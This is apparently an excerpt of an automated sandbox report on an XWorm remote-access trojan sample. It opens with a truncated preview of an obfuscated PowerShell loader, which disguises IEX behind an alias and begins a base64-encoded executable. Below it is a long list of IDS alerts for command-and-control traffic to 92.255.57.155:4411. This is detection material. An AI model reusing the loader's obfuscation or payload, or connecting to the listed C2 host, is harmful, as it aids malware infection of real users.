                                  File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

                                  File Icon

                                  Icon Hash:3270d6baae77db44

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-18T08:15:28.448524+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:15:28.448524+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:15:33.428012+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:15:33.899749+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:15:33.902091+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:15:45.767192+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:15:45.771661+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:15:57.671967+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:15:57.674231+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:15:58.442730+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:09.578020+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:09.580469+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:21.484388+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:21.486706+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:23.488331+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:23.547003+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:23.737970+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:23.800469+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:24.058420+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:24.060029+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:24.200605+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:24.249443+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:24.249538+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:24.341618+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:25.203192+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:25.255032+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:25.394199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:25.503746+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:27.293989+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:27.295911+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:28.075972+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:28.083085+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:28.266958+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:28.269318+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:28.556971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:28.562810+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:28.746780+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.168287+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.359151+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.424415+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.550152+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.736027+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.829091+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:29.897905+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.047995+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.164397+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.164514+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.213412+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.355330+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.359257+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.212079+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.356071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.404817+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.476788+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.524481+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.595467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.646166+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.723220+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.906559+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.937571+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.128606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.133889+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.360490+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.362180+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.444462+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.481784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.135361+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.186441+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.326236+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.417459+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.446302+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.517294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.637143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.697480+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.828222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.835284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.947863+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.997584+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:34.008216+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:34.117799+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:34.138848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:34.240500+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.439400+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.482478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.630348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.793268+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.822385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.984120+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.010043+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.077256+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.130660+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.442149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.490754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.778303+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.781610+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.640407+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:38.748427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.767572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:38.909410+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.939562+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.029084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:39.130433+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.148733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:39.220304+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.268439+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:41.203799+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:41.205722+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:43.056545+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:43.072733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:43.247444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:43.253090+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:44.203380+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.248195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:44.394156+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.558782+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.585112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.870997+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.893943+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.065225+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.069824+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.204642+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.207454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.388131+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.492026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.047441+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.049893+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.237899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.244129+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.361006+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.364366+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:48.829767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:48.867349+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:49.068332+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:49.070621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:50.452758+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.578931+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.763690+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.781213+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:50.959334+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:51.270231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:51.321655+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:51.731575+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:51.735444+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:52.765459+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.137525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.138080+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:53.138802+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.267219+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.361065+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:53.552143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.644963+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:54.377471+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:54.391343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:54.567651+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:54.616929+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:55.861018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:55.862312+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:56.460091+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:56.530712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:56.901212+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:56.909860+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:57.089201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:57.223265+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:57.369442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.044230+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.296589+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.298171+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.724805+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.726092+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.969995+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:59.106524+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:59.107296+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.254126+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.294866+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.444796+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.565009+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
